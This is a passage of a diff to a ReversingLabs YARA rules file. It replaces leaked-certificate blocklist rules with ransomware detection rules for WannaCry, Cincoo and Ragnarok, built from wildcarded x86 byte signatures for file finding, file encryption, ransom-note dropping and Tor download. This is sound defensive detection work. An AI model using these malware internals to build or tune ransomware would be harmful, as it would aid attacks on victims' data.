+            F0 83 C4 ?? 85 F6 75 ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8D 74 04 ?? EB ?? 8D 57 ??
+            8D 4C 24 ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 4C 24
+            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 EB ?? C6 06 ?? 68 ?? ?? ??
+            ?? 56 FF D3 8B 44 24 ?? 50 56 FF D3 8D 4C 24 ?? 55 51 FF 15 ?? ?? ?? ?? 8B F0 33 D2
+            83 FE ?? 0F 9F C2 8D 4C 24 ?? 8B F2 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            5D 8B C6 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Media Lid" and pe.signatures [ i ] . serial == "2c:e2:bd:0a:d3:cf:de:9e:a7:3e:ec:7c:a3:04:00:da" and 1493337599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $exec_proc )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Fbc30Db127A536C34D7A0Fa81B48193 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wannacry : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects WannaCry ransomware."
 		author = "ReversingLabs"
-		id = "c755a6c1-e113-5513-9a61-87bf6d7dcb3e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "61734d47-2525-5e3a-94b4-60493dfe2b93"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2248-L2264"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WannaCry.yara#L3-L135"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6b109b5636aa297a6e07f9d9213f7f07a7767b58442d03dc2f34f8a9b3eaba2b"
+		logic_hash = "fed58b533a9f7c3eb1b3e4f8fbe1f519aab94d1c066ae6937c21876693be0eac"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WannaCry"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$main_1 = {
+            A0 ?? ?? ?? ?? 56 57 6A ?? 88 85 ?? ?? ?? ?? 59 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB
+            AA 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88
+            18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85
+            C0 74 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D
+        }
+		$main_2 = {
+            68 ?? ?? ?? ?? 33 DB 50 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 15
+            ?? ?? ?? ?? 83 38 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 00 FF 70 ?? E8 ?? ??
+            ?? ?? 59 85 C0 59 75 ?? 53 E8 ?? ?? ?? ?? 85 C0 59 74 ?? BE ?? ?? ?? ?? 53 8D 85 ??
+            ?? ?? ?? 56 50 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0
+            59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            53 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 68 ?? ?? ?? ?? E8
+        }
+		$main_3 = {
+            83 EC ?? 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7C 24 ?? 33 C0 F3 A5 A4 89 44 24 ??
+            89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 50 50 50 6A ?? 50 88
+            44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 8B F0 6A ?? 51 56
+            FF 15 ?? ?? ?? ?? 8B F8 56 8B 35 ?? ?? ?? ?? 85 FF 75 ?? FF D6 6A ?? FF D6 E8
+        }
+		$start_service_3 = {
+            83 EC ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            38 ?? 7D ?? E8 ?? ?? ?? ?? 83 C4 ?? C3 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 8B F8 85 FF 74 ?? 53 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D
+            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E
+            5B 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 83 C4 ?? C3
+        }
+		$main_4 = {
+            83 EC ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 53 56 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 ??
+            6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E 5B 8D 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 33 C0 5F 83 C4 ?? C2
+        }
+		$main_5 = {
+            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
+            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 3B C3 74 ?? FF 75 ?? 50 E8
+            ?? ?? ?? ?? 59 3B C3 59 74 ?? 68 ?? ?? ?? ?? 50 E8
+        }
+		$main_6 = {
+            FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? C2
+        }
+		$set_reg_key_6 = {
+            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B 2D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 FF 89 7C 24 ?? 85 FF 75 ?? 8D 4C
+            24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? ?? EB ?? 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 85
+            C9 74 ?? 8D 94 24 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF D5 8D BC 24 ?? ?? ?? ?? 83 C9 ??
+            33 C0 F2 AE F7 D1 8D 84 24 ?? ?? ?? ?? 51 8B 4C 24 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
+            51 FF D3 8B 7C 24 ?? 8B F0 F7 DE 1B F6 46 EB ?? 8D 54 24 ?? 8D 8C 24 ?? ?? ?? ?? 52
+            51 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15
+        }
+		$download_tor_6 = {
+            81 EC ?? ?? ?? ?? 53 55 56 57 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A0 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 88 44 24 ?? 33 C0 8D 7C 24 ?? 8B 35 ?? ?? ?? ?? F3 AB 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 66 AB 68 ?? ?? ?? ?? 8D 4C 24 ?? 33 ED 68 ?? ?? ?? ?? 51 89 2D ?? ??
+            ?? ?? 89 2D ?? ?? ?? ?? AA FF D6 8B 1D ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 FF D3 83
+            F8 ?? 0F 85 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84
+            C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 A0 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 84 24 ??
+            ?? ?? ?? 33 C0 8D BC 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 AB 66 AB 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 AA FF D6 83 C4 ?? 8D 94 24 ?? ?? ??
+            ?? 52 FF D3 83 F8 ?? 75 ?? 5F 5E 5D 32 C0 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$main_7 = {
+            68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D
+            8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 53 8F 45 ?? E8 ?? ?? ?? ?? 39 44 24 ?? 74 ?? 89 44
+            24 ?? 83 EC ?? 2B C3 58 74 ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 59 89 44 24 ?? 83 EC ?? 2B
+            C3 58 59 74 ?? 68 ?? ?? ?? ?? 50 E8
+        }
+		$main_8 = {
+            68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ??
+            ?? 8D 4C 24 ?? 6A ?? 51 FF D6 83 C4 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 FF D6 83 C4
+            ?? C6 00 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
+            5E 85 C0 74 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 50 E8
+        }
+		$entrypoint_all = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
+            ?? 83 EC ?? 53 56 57 89 65 ?? 33 DB 89 5D ?? 6A ?? FF 15 ?? ?? ?? ?? 59 83 0D ?? ??
+            ?? ?? ?? 83 0D ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 08 FF 15 ?? ??
+            ?? ?? 8B 0D ?? ?? ?? ?? 89 08 A1 ?? ?? ?? ?? 8B 00 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 39
+            1D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 35 ?? ?? ??
+            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Megabit, OOO" and pe.signatures [ i ] . serial == "0f:bc:30:db:12:7a:53:6c:34:d7:a0:fa:81:b4:81:93" and 1466121599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $entrypoint_all at pe.entry_point ) and ( $main_1 or $main_2 or ( $main_3 and $start_service_3 ) or $main_4 or $main_5 or ( $main_6 and ( $set_reg_key_6 or $download_tor_6 ) ) or $main_7 or $main_8 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_08448Bd6Ee9105Ae31228Ea5Fe496F63 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cincoo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Cincoo ransomware."
 		author = "ReversingLabs"
-		id = "489ffe25-43cf-55b6-b249-17d251b9774e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c7c2773c-5056-5127-8af7-7f5c5a8ea8a1"
+		date = "2022-06-21"
+		modified = "2022-06-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2266-L2282"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cincoo.yara#L1-L78"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9bc044b4fdf381274a2c31bc997dcdfd553595d92de7b33dc472353a00011711"
+		logic_hash = "6a7562cae90754ea75a9fb98ce73ebdb9acf1ad7f28f2240abe6cb592d717ca3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cincoo"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
+            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
+            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
+            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 ?? ??
+            ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? 85 C0
+            75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 EC ?? 8B 45 ?? 53 8B D9 89 45 ?? B9 ?? ?? ?? ?? 8B C1 56 8B 53 ?? 2B C2
+            8B 75 ?? 89 55 ?? 57 3B C6 0F 82 ?? ?? ?? ?? 8B 7B ?? 8D 04 32 8B F0 89 45 ?? 83 CE
+            ?? 89 7D ?? 3B F1 76 ?? 8B F1 EB ?? 8B C7 D1 E8 2B C8 3B F9 76 ?? BE ?? ?? ?? ?? EB
+            ?? 03 C7 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 81 F9 ?? ?? ?? ??
+            72 ?? 8D 41 ?? 3B C1 0F 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B 55 ?? 8D 78 ?? 83 E7 ?? 89 47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 8B 55
+            ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 45 ?? 89 43 ?? 8B 45 ?? 89 73 ?? 8D 34 3A 03 C6 83
+            7D ?? ?? 89 45 ?? 52 72 ?? 8B 33 56 57 E8 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF 75 ?? 03
+            C7 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 41 C6 00 ?? 81 F9 ?? ?? ?? ?? 72 ??
+            8B 56 ?? 83 C1 ?? 2B F2 8D 46 ?? 83 F8 ?? 77 ?? 8B F2 51 56 E8 ?? ?? ?? ?? 83 C4 ??
+            89 3B 8B C3 5F 5E 5B 8B E5 5D C2 ?? ?? 53 57 E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 56 E8
+            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C6 00 ?? 8B C3 89 3B 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC CC CC 56 8B F1 FF 76 ?? E8 ?? ?? ?? ?? 8B
+            4E ?? 83 F9 ?? 72 ?? 8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83
+            C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ??
+            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 66 89 06 5E C3 E8 ?? ?? ?? ?? CC CC CC CC CC CC
+            8B 09 85 C9 74 ?? 8B 01 6A ?? FF 10 C3
+        }
+		$drop_ransom_note = {
+            52 51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 8D 4D ?? C6 46 ?? ??
+            E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D
+            4E ?? 50 E8 ?? ?? ?? ?? 81 CF ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ??
+            ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 83 F8 ??
+            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
+            04 0E 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 44 30 ?? ?? 8D 85 ?? ?? ?? ??
+            EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raffaele Carnacina" and pe.signatures [ i ] . serial == "08:44:8b:d6:ee:91:05:ae:31:22:8e:a5:fe:49:6f:63" and 1445212799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_02F17566Ef568Dc06C9A379Ea2F4Faea : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ragnarok : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Ragnarok ransomware."
 		author = "ReversingLabs"
-		id = "a14e16ff-844c-53ff-9297-8760265da747"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "263a671e-dfdb-5ab8-9bb9-355c76a88c10"
+		date = "2020-07-07"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2284-L2300"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ragnarok.yara#L1-L110"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e3ec8a6de817354862880301e78a999f45f02c2fa8512bba6d27c9776f1a3417"
+		logic_hash = "aaa17ab98b59a5c8c71a2b82a9bf29dd3a1a1719deaf08a3bafa77895bc10311"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ragnarok"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 8B E5 5D C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8
+            ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            75 ?? FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B
+            5D ?? 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59
+            EB ?? 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C
+            ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95
+            ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53
+            57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ??
+            74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ??
+            ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF
+            15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ??
+            ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80
+            38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ??
+            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ??
+            2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 8B 4D ?? 56 57 89
